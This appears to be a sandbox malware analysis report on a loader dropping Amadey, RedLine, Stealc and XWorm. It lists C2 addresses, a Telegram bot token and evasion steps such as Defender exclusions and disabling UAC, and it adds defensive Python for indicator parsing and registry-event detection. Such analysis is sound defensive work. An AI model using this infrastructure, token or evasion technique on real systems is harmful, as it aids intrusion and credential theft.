Analysis

max time kernel: 150s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20240419-en
resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 29-04-2024 11:52
Static task: static1

Behavioral task: behavioral1
  Sample: 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  Resource: win10v2004-20240419-en

Behavioral task: behavioral2
  Sample: 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  Resource: win11-20240419-en
General

Target: 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
Size: 1.8MB
MD5: bf566129575a45e4eb59063f364913ef
SHA1: 82ab797499cbf9faec158bb55bfef2c24086bc4a
SHA256: 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0
SHA512: 2d1f0aeea9ac9efd2e8071f0696b1c4afecb9748a2a458b799c5fd67b58b4521d1257e30f8fceea9e57a657d3259044cca355ab2a78880cd6bafb43e964560f8
SSDEEP: 24576:2dqrbnKGO+sgYNJQX1iSb0UcpxhT0t+AyPZx2ApfZ6t2Bc1eaCzHbSDAyjkegasm:a6vcvxhpfgtume1GjkFasi/9d1lF+rv
Malware Config

Extracted: amadey
  Version: 4.17
  C2: http://193.233.132.167
  install_dir: 4d0ab15804
  install_file: chrosha.exe
  strings_key: 1a9519d7b465e1f4880fa09a6162d768
  url_paths: /enigma/index.php

Extracted: redline
  Botnet: @CLOUDYTTEAM
  C2: 185.172.128.33:8970

Extracted: redline
  Botnet: Test1234
  C2: 185.215.113.67:26260

Extracted: stealc
  C2: http://52.143.157.84
  url_path: /c73eed764cc59dcb.php

Extracted: xworm
  Version: 5.0
  C2: 127.0.0.1:7000
  C2: 91.92.252.220:7000
  C2: 41.199.23.195:7000
  C2: saveclinetsforme68465454711991.publicvm.com:7000
  Mutex: bBT8anvIxhxDFmkf
  Install_directory: %AppData%
  install_file: explorer.exe
  telegram: https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted: redline
  Botnet: cheat
  C2: saveclinetsforme68465454711991.publicvm.com:1111
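The five extracted configs above share infrastructure: the publicvm.com host serves both the xworm payload (port 7000) and the "cheat" redline build (port 1111), the 127.0.0.1:7000 entry is a builder leftover rather than a reachable C2, and the xworm exfiltration channel is a legitimate service (api.telegram.org) whose bot token should not be pasted into tickets. The following is an added example, not part of the Triage report; the CONFIGS table is transcribed from the config section (the amadey URL joins the reported C2 host with its url_paths value), and the function names, the allowlist of legitimate services and the token redaction are this example's own choices.

```python
import re
from urllib.parse import urlsplit

# Raw C2 entries transcribed from the Malware Config section of this report
# (family -> entries). The amadey URL joins the C2 host and its url_paths value.
CONFIGS = {
    "amadey":  ["http://193.233.132.167/enigma/index.php"],
    "redline": ["185.172.128.33:8970", "185.215.113.67:26260",
                "saveclinetsforme68465454711991.publicvm.com:1111"],
    "stealc":  ["http://52.143.157.84/c73eed764cc59dcb.php"],
    "xworm":   ["127.0.0.1:7000", "91.92.252.220:7000", "41.199.23.195:7000",
                "saveclinetsforme68465454711991.publicvm.com:7000",
                "https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/"
                "sendMessage?chat_id=966649672"],
}

# Legitimate services abused for exfiltration: monitor, do not block at the edge
# (assumption: a small allowlist is enough for this report).
LEGIT_SERVICES = {"api.telegram.org"}

_BOT_TOKEN = re.compile(r"/bot(\d+):[A-Za-z0-9_-]+")


def redact_bot_token(url):
    """Keep the numeric bot id (a stable indicator) and drop the secret half."""
    return _BOT_TOKEN.sub(r"/bot\1:<redacted>", url)


def parse_indicator(raw):
    """Turn 'host:port' or a URL into {'host', 'port', 'kind', 'value'}."""
    if "://" in raw:
        u = urlsplit(raw)
        port = u.port or (443 if u.scheme == "https" else 80)
        return {"host": u.hostname, "port": port, "kind": "url",
                "value": redact_bot_token(raw)}
    host, _, port = raw.rpartition(":")
    return {"host": host, "port": int(port), "kind": "socket", "value": raw}


def is_loopback(host):
    return host == "localhost" or host.startswith("127.")


def actionable_indicators(configs):
    """One row per (family, host, port); loopback placeholders are dropped and
    legitimate services are tagged 'monitor' instead of 'block'."""
    rows = []
    for family, entries in configs.items():
        for raw in entries:
            ind = parse_indicator(raw)
            if is_loopback(ind["host"]):
                continue  # 127.0.0.1:7000 is a builder default, not a C2
            ind["family"] = family
            ind["action"] = "monitor" if ind["host"] in LEGIT_SERVICES else "block"
            rows.append(ind)
    return rows


def shared_hosts(configs):
    """Hosts present in more than one family's config: one operator (or one
    loader customer) is running several payloads from the same box."""
    seen = {}
    for family, entries in configs.items():
        for raw in entries:
            seen.setdefault(parse_indicator(raw)["host"], set()).add(family)
    return {host: fams for host, fams in seen.items() if len(fams) > 1}


if __name__ == "__main__":
    for row in actionable_indicators(CONFIGS):
        print(f"{row['action']:7} {row['family']:8} {row['host']}:{row['port']}")
    for host, fams in shared_hosts(CONFIGS).items():
        print("shared:", host, sorted(fams))
```

The redacted Telegram URL still carries the bot id, which is what you would pivot on; the token itself is only useful to whoever wants to read the bot's messages.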
Signatures

Detect Xworm Payload (2 IoCs)
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe | family_xworm
  behavioral2/memory/2684-382-0x00000000000A0000-0x00000000000B2000-memory.dmp | family_xworm

Detect ZGRat V1 (3 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/4984-72-0x0000000000400000-0x0000000000592000-memory.dmp | family_zgrat_v1
  C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | family_zgrat_v1
  behavioral2/memory/4664-132-0x0000000000830000-0x00000000008F0000-memory.dmp | family_zgrat_v1
Modifies firewall policy service (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | ie0aAKIgoNHvWYyFkf1CZCFR.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (7 IoCs)
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe | family_redline
  C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe | family_redline
  behavioral2/memory/3932-112-0x0000000000330000-0x0000000000382000-memory.dmp | family_redline
  behavioral2/memory/4664-132-0x0000000000830000-0x00000000008F0000-memory.dmp | family_redline
  C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe | family_redline
  behavioral2/memory/3024-176-0x00000000004D0000-0x0000000000522000-memory.dmp | family_redline
  behavioral2/memory/2684-839-0x0000000000790000-0x00000000007AE000-memory.dmp | family_redline
SectopRAT payload (1 IoC)
Processes:
  resource | yara_rule
  behavioral2/memory/2684-839-0x0000000000790000-0x00000000007AE000-memory.dmp | family_sectoprat
(signature title not captured)
Processes:
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file300un.exe

(signature title not captured)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | file300un.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe = "0" | file300un.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | ie0aAKIgoNHvWYyFkf1CZCFR.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | chrosha.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ie0aAKIgoNHvWYyFkf1CZCFR.exe
Blocklisted process makes network request (4 IoCs)
Processes:
  flow | pid | process
  36 | 3984 | rundll32.exe
  49 | 2060 | rundll32.exe
  107 | 4852 | rundll32.exe
  49 | 2060 | rundll32.exe
Downloads MZ/PE file
Checks BIOS information in registry (2 TTPs, 8 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | chrosha.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | chrosha.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Control Panel\International\Geo\Nation | ZilJVJq.exe
Executes dropped EXE (33 IoCs)
Processes:
  pid | process
  1628 | chrosha.exe
  3496 | swiiiii.exe
  3068 | alexxxxxxxx.exe
  2132 | gold.exe
  3932 | keks.exe
  4664 | trf.exe
  4596 | NewB.exe
  3024 | jok.exe
  4784 | ISetup8.exe
  4268 | swiiii.exe
  4284 | toolspub1.exe
  3076 | 4767d2e713f2021e8fe856e3ea638b58.exe
  2756 | file300un.exe
  2684 | mstc.exe
  2316 | lie.exe
  4180 | GWyWImjPJrYl6admmUmbQ0no.exe
  3916 | 3gDOeUlDsghAqoZiZwcsvUk8.exe
  5032 | AFKn6lGaqzeckkfrsADTscxf.exe
  2088 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  4580 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  2296 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  2916 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  2148 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  1452 | VMfqgcBmOfC7mvnEpVVoTO7Y.exe
  3696 | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  4052 | Install.exe
  1284 | Install.exe
  2324 | Assistant_109.0.5097.45_Setup.exe_sfx.exe
  3744 | assistant_installer.exe
  1676 | assistant_installer.exe
  2772 | NewB.exe
  3896 | explorer.exe
  1456 | ZilJVJq.exe
Identifies Wine through registry keys (2 TTPs, 2 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Software\Wine | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  Key opened | \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Software\Wine | chrosha.exe
Loads dropped DLL (13 IoCs)
Processes:
  pid | process
  3396 | rundll32.exe
  3984 | rundll32.exe
  2060 | rundll32.exe
  2088 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  4580 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  2296 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  2916 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  2148 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  3744 | assistant_installer.exe
  3744 | assistant_installer.exe
  1676 | assistant_installer.exe
  1676 | assistant_installer.exe
  4852 | rundll32.exe
Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
(signature title not captured)
Processes:
  resource | yara_rule
  C:\Users\Admin\Pictures\ie0aAKIgoNHvWYyFkf1CZCFR.exe | themida
  behavioral2/memory/3696-597-0x0000000140000000-0x0000000140786000-memory.dmp | themida
  behavioral2/memory/3696-684-0x0000000140000000-0x0000000140786000-memory.dmp | themida
(signature title not captured)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | file300un.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | file300un.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe = "0" | file300un.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | ie0aAKIgoNHvWYyFkf1CZCFR.exe
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-734199974-1358367239-436541239-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" | mstc.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
(signature title not captured)
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | file300un.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file300un.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ie0aAKIgoNHvWYyFkf1CZCFR.exe
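The registry writes recorded above (the firewall rule under FirewallPolicy\FirewallRules, the Defender exclusions, EnableLUA set to 0, and the Run key pointing into %AppData%) are the kind of events Sysmon reports as EventID 13 (RegistryEvent, value set), so they can be matched on endpoints without the sandbox. The following is an added example, not part of the Triage report: the event records are constructed to mirror the IoCs on this page (process paths as the report shows them, Sysmon's "DWORD (0x...)" rendering for REG_DWORD data), the last two records are benign controls, and the severities and the "svchost.exe writes firewall rules, nobody else should" heuristic are this example's own choices. Note that a root-of-volume exclusion (Exclusions\Paths\C:\) is treated as worse than a single-file exclusion because it silences Defender for the whole drive.

```python
import re

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
_DWORD = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")

# Constructed Sysmon EventID 13 (value set) records modelled on the IoCs above;
# not real telemetry. The last two are benign controls.
EVENTS = [
    {"Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000238001\\file300un.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
                     "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000238001\\file300un.exe",
     "Details": "DWORD (0x00000000)"},
    {"Image": "C:\\Users\\Admin\\Pictures\\ie0aAKIgoNHvWYyFkf1CZCFR.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\",
     "Details": "DWORD (0x00000001)"},
    {"Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000238001\\file300un.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    {"Image": "C:\\Users\\Admin\\Pictures\\ie0aAKIgoNHvWYyFkf1CZCFR.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\"
                     "FirewallPolicy\\FirewallRules\\C:\\",
     "Details": "DWORD (0x00000001)"},
    {"Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000239001\\mstc.exe",
     "TargetObject": "HKU\\S-1-5-21-734199974-1358367239-436541239-1000\\Software\\Microsoft\\"
                     "Windows\\CurrentVersion\\Run\\explorer",
     "Details": "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe"},
    # benign: an installer registers an agent that lives under Program Files
    {"Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ContosoAgent",
     "Details": "C:\\Program Files\\Contoso\\agent.exe"},
    # benign: the firewall service itself (svchost) persisting a rule (constructed rule string)
    {"Image": "C:\\Windows\\System32\\svchost.exe",
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\"
                     "FirewallPolicy\\FirewallRules\\{7A1B2C3D-0000-4000-8000-000000000001}",
     "Details": "v2.31|Action=Allow|Active=TRUE|Dir=In|App=C:\\Program Files\\Contoso\\agent.exe|"},
]


def _dword(details):
    m = _DWORD.fullmatch(details)
    return int(m.group(1), 16) if m else None


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def classify(ev):
    """Return a list of (severity, message) findings for one value-set event."""
    t, tl, img = ev["TargetObject"], ev["TargetObject"].lower(), _base(ev["Image"])
    out = []
    if "\\windows defender\\exclusions\\paths\\" in tl:
        excluded = re.split(r"\\exclusions\\paths\\", t, maxsplit=1, flags=re.I)[1]
        root = re.fullmatch(r"[a-z]:\\?", excluded, flags=re.I) is not None
        out.append(("critical" if root else "high",
                    f"{img} excluded {'the whole volume ' if root else ''}{excluded} from Defender"))
    elif "\\windows defender\\exclusions\\" in tl:
        out.append(("high", f"{img} changed a Defender exclusion: {t}"))
    if tl.endswith("\\policies\\system\\enablelua") and _dword(ev["Details"]) == 0:
        out.append(("high", f"{img} disabled UAC (EnableLUA=0)"))
    if "\\firewallpolicy\\firewallrules\\" in tl and img != "svchost.exe":
        out.append(("medium", f"{img} wrote a firewall rule directly to the registry"))
    if "\\currentversion\\run\\" in tl and _user_writable(ev["Details"]):
        out.append(("medium", f"{img} set Run value {t.rsplit(chr(92), 1)[-1]} -> {ev['Details']}"))
    return out


def triage(events):
    return [{"severity": sev, "finding": msg} for ev in events for sev, msg in classify(ev)]


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['severity']:8} {f['finding']}")
```

Sysmon only sees these writes if its configuration includes the Defender, Policies\System, FirewallPolicy and Run key paths in its RegistryEvent rules; a default configuration logs none of them.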
Drops Chrome extension (2 IoCs)
Processes:
  description | ioc | process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | ZilJVJq.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | ZilJVJq.exe
Drops desktop.ini file(s) (1 IoC)
Processes:
  description | ioc | process
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | ZilJVJq.exe
Enumerates connected drives (3 TTPs, 4 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description | ioc | process
  File opened (read-only) | \??\D: | YtVJ0C8eA764GvOCeDcLOEZg.exe
  File opened (read-only) | \??\F: | YtVJ0C8eA764GvOCeDcLOEZg.exe
  File opened (read-only) | \??\D: | YtVJ0C8eA764GvOCeDcLOEZg.exe
  File opened (read-only) | \??\F: | YtVJ0C8eA764GvOCeDcLOEZg.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
Looks up external IP address via web service (5 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  68 | api.myip.com
  73 | ipinfo.io
  74 | ipinfo.io
  25 | ip-api.com
  59 | api.myip.com
Drops file in System32 directory (35 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | Install.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | ZilJVJq.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | ZilJVJq.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C77EC0FCAF0A83EAAF0F4351F61FA27 | ZilJVJq.exe
  File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F71C9FE0DBB76538B4EB93E5DEE9B878 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F | ZilJVJq.exe
  File opened for modification | C:\Windows\System32\GroupPolicy | ie0aAKIgoNHvWYyFkf1CZCFR.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | ZilJVJq.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_91B924923180E8714F1EDBCBF8DDC70F | ZilJVJq.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
Processes:
  pid | process
  4452 | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
  1628 | chrosha.exe
  3696 | ie0aAKIgoNHvWYyFkf1CZCFR.exe
Suspicious use of SetThreadContext (5 IoCs)
Processes:
  description | pid | process | target process
  PID 3496 set thread context of 916 | 3496 | swiiiii.exe | RegAsm.exe
  PID 3068 set thread context of 4984 | 3068 | alexxxxxxxx.exe | RegAsm.exe
  PID 2132 set thread context of 4696 | 2132 | gold.exe | RegAsm.exe
  PID 4268 set thread context of 3840 | 4268 | swiiii.exe | RegAsm.exe
  PID 2756 set thread context of 4748 | 2756 | file300un.exe | jsc.exe
Drops file in Program Files directory (14 IoCs)
Processes:
  description | ioc | process
  File created | C:\Program Files (x86)\zgoZGMcaU\sAfEORO.xml | ZilJVJq.exe
  File created | C:\Program Files (x86)\epoBtGYzqLvU2\TYrPUGCQcWGqm.dll | ZilJVJq.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | ZilJVJq.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | ZilJVJq.exe
  File created | C:\Program Files (x86)\epoBtGYzqLvU2\kvuTHLF.xml | ZilJVJq.exe
  File created | C:\Program Files (x86)\ecOJmsgAHWlsC\gmFjMYt.dll | ZilJVJq.exe
  File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | ZilJVJq.exe
  File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | ZilJVJq.exe
  File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | ZilJVJq.exe
  File created | C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qqjiZcs.xml | ZilJVJq.exe
  File created | C:\Program Files (x86)\ecOJmsgAHWlsC\AIHTAaQ.xml | ZilJVJq.exe
  File created | C:\Program Files (x86)\qIYKRzUEasUn\gggdOdx.dll | ZilJVJq.exe
  File created | C:\Program Files (x86)\zgoZGMcaU\YPGQWq.dll | ZilJVJq.exe
  File created | C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\ketlGwn.dll | ZilJVJq.exe
Drops file in Windows directory (5 IoCs)
Processes:
  description | ioc | process
  File created | C:\Windows\Tasks\biPxHmULFllsbMgnpt.job | schtasks.exe
  File created | C:\Windows\Tasks\yfARWRprRqUFWeTGf.job | schtasks.exe
  File created | C:\Windows\Tasks\JHJXtPPPvDXVqpH.job | schtasks.exe
  File created | C:\Windows\Tasks\aNyMQclguOCSCcjxm.job | schtasks.exe
  File created | C:\Windows\Tasks\chrosha.job | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (3 IoCs)
Processes:
  pid | pid_target | process | target process
  4480 | 3496 | WerFault.exe | swiiiii.exe
  1632 | 3068 | WerFault.exe | alexxxxxxxx.exe
  2368 | 2132 | WerFault.exe | gold.exe
